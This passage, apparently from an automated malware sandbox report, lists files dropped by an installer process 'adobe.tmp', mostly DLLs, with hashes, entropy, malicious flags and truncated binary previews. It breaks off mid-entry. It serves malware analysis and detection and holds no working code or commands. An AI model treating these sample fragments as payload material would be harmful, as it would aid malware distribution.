                                                                                                                                                        SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                                                                                        SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19008
                                                                                                                                                        Entropy (8bit):7.672481244971812
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                                                                                        MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                                                                                        SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                                                                                        SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                                                                                        SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68876
                                                                                                                                                        Entropy (8bit):7.922125376804506
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                                                                                        MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                                                                                        SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                                                                                        SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                                                                                        SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):17472
                                                                                                                                                        Entropy (8bit):7.524548435291935
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                                                                                        MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                                                                                        SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                                                                                        SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                                                                                        SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):35588
                                                                                                                                                        Entropy (8bit):7.817557274117395
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                                                                                        MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                                                                                        SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                                                                                        SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                                                                                        SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\copying (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1059
                                                                                                                                                        Entropy (8bit):5.1208137218866945
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                                                                                        MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                                                                                        SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                                                                                        SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                                                                                        SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16910
                                                                                                                                                        Entropy (8bit):5.289608933932413
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                                                                                        MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                                                                                        SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                                                                                        SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                                                                                        SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.192037544202194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                                                                        MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                                                                        SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                                                                        SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                                                                        SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):197646
                                                                                                                                                        Entropy (8bit):6.1570532273946625
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                                                                                        MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                                                                                        SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                                                                                        SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                                                                                        SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31936
                                                                                                                                                        Entropy (8bit):6.6461204214578
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                                                                                        MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                                                                                        SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                                                                                        SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                                                                                        SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):197120
                                                                                                                                                        Entropy (8bit):6.423554884287906
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                                                                                        MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                                                                                        SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                                                                                        SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                                                                                        SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dstt.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):115712
                                                                                                                                                        Entropy (8bit):6.401537154757194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                                                                                        MD5:840D631DA54C308B23590AD6366EBA77
                                                                                                                                                        SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                                                                                        SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                                                                                        SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\ff_helper.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):62478
                                                                                                                                                        Entropy (8bit):6.063363187934607
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                                                                                        MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                                                                                        SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                                                                                        SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                                                                                        SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\gain_analysis.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26126
                                                                                                                                                        Entropy (8bit):6.048294343792499
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                                                                                        MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                                                                                        SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                                                                                        SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                                                                                        SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-1USFT.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1059
                                                                                                                                                        Entropy (8bit):5.1208137218866945
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                                                                                        MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                                                                                        SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                                                                                        SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                                                                                        SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-1V9NR.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):772608
                                                                                                                                                        Entropy (8bit):6.546391052615969
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                                                                                        MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                                                                                        SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                                                                                        SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                                                                                        SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-268GJ.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):62478
